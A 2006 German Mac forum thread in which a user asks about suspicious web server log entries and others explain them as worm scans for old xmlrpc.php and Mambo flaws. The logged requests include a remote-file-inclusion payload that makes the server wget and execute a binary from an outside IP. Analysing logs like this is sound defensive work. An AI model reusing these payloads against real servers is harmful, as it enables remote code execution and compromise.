Angriff auf Web Server?

RUMTom · 12.02.06

Moin,

ich habe jetzt seit ein paar Tagen auf einen frisch installiertes System 10.4 einen Web Server laufen. Nur mal so zum testen, mit recht wenig Traffic über dyndns.org.

Beim durchschauen der Web-Logs sind mir zwei Sachen aufgefallen:

Code:

217.153.134.21 - - [11/Feb/2006:09:36:59 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:00 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:02 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:03 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:04 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:05 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:06 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:08 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:09 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:37:10 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Ich könnte mir denken, daß hier jemand versucht, ein nicht vorhandenes Gästebuch oder Blog zuzumüllen.

Aber was könnte es hiermit auf sich haben? :

Code:

207.5.192.108 - - [12/Feb/2006:04:04:34 +0100] "GET /RUMtrol.html HTTP/1.1" 200 728 "http://us.f353.mail.yahoo.com/ym/ShowLetter?MsgId=8430_1528707_67232_1619_52_0_7849_-1_0&Idx=3&YY=40765&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=Inbox" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

oder auch das?

Code:

217.153.134.21 - - [11/Feb/2006:09:36:54 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:36:55 +0100] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:36:56 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
217.153.134.21 - - [11/Feb/2006:09:36:58 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 200 549 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Muss man sich darüber Sorgen machen, oder ist das der ganz normale Wahnsinn??

Gruß aus dem nebligen Hamburg

MacMark · 12.02.06

Das Netz ist voll mit Zombies. Zombies sind von Schadprogrammen übernommene Windows-Installationen, die ihren Wirt nutzen, um sich weiter zu verbreiten bzw. automatisch nach bekannten Lücken auf anderen Rechnern im Netz zu suchen und diese dann zu nutzen. Da wird alles probiert.

RUMTom · 12.02.06

Aja.
Da du von Windows-Installationen schreibst, brauche ich mir wohl keine weiteren Gedanken drüber machen.

fantaboy · 12.02.06

ich glaube nicht, das diese sache etwas mit windows zu tun hat. leider bin ich kein profi, kann also die daten auch nicht wirklich entschlüsseln. aber es scheint doch so zu sein, als ob es sich hier um einen angriff bzw. spam auf ein blog handelt. mambo, wordpress etc. sind cms- oder blogprogramme.
ich tippe mal darauf, dass ein bot versucht, kommentare in ein blog zu spammen. allerdings bin ich mit der url auch nirgends hingekommen. wenn man aber die letzte eins weglässt, kommt man auf ne polnische seite. polnisch kann ich aber auch nicht.
ich würde zumindest diese url mal sperren, falls das bei dir möglich ist. und auf den blogs findest du bestimmt infos, wie man damit umgeht.
hoffe, konnte dir trotz halbwissen ein bischen weiterhelfen.

gruss

jürgen

Nogger · 12.02.06

Das ganze kommt von Würmern, die über Fehler in älteren Versionen von Web-Applikationen eine Rechner befallen haben und von dem aus einfach blind versuchen eine weitere Installation der fehlerhaften Versionen im Netz zu finden, um sich weiterzuverbreiten.

Wenn du wissen willst, was es alles ist, einfach nur googlen. Z.B. nach "xmlrpc.php worm", gibt dann u.a. http://www.lurhq.com/slapperv2.html zurück.

Code:

207.5.192.108 - - [12/Feb/2006:04:04:34 +0100] "GET /RUMtrol.html HTTP/1.1" 200 728 "http://us.f353.mail.yahoo.com/ym/ShowLetter?MsgId=8430_1528707_67232_1619_52_0_7849_-1_0&Idx=3&YY=40765&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=Inbox" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Jemand hat einen Link in einer Mail im Yahoo Webmail angeklickt (oder Yahoo läßt IFrames o.ä. in HTML-Mails zu) und der Link hat als Serveradresse deine aktuelle IP-Adresse oder (versehentlich) deinen dyndns-Namen gehabt. Komisch, aber uninteressant und bedeutungslos. Ich finde es übrigens merkwürdig, das Yahoo keine Maßnahmen ergreift um den Referrer zu löschen. Oder jemand hat es umgangen.

Code:

217.153.134.21 - - [11/Feb/2006:09:36:54 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Wieder ein Wurm, der diesmal nach einer fehlerhaften, alte Mambo-Installation sucht. http://www.heise.de/newsticker/meldung/67006

Muss man sich darüber Sorgen machen, oder ist das der ganz normale Wahnsinn??

Es ist das normale Hintergrundrauschen. Du hast die anvisierte Software nicht installiert, also kann es dir egal sein. Wenn du irgendwelceh Web-Applikationen installierst, dann achte darauf, daß sie immer auf dem aktuellen Stand sind. Eigentlich alle Anbieter haben Mailinglisten, in denen sie über wichtige Updates informieren.

Wenn du für deine Versuche keine Zugriffe vo naußen brauchst, also nur lokal arbeitest, dann kannst du in der Firewall auch den Zugriff von außen auf den Webserver ausschalten. Du selbst kannst immernoch über

Code:

http://localhost

auf den Webserver zugreifen.

Suche

Suche

Angriff auf Web Server?

RUMTom

Grahams Jubiläumsapfel

MacMark

Jakob Lebel

RUMTom

Grahams Jubiläumsapfel

fantaboy

Leipziger Reinette

Nogger

Damasonrenette

Wir schützen Ihre Privatsphäre

Informationen auf einem Gerät speichern und/oder abrufen

Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen (Optionale Cookies)

Datenübermittlung an Partner in anderen Staaten (Drittanbieter-Cookies)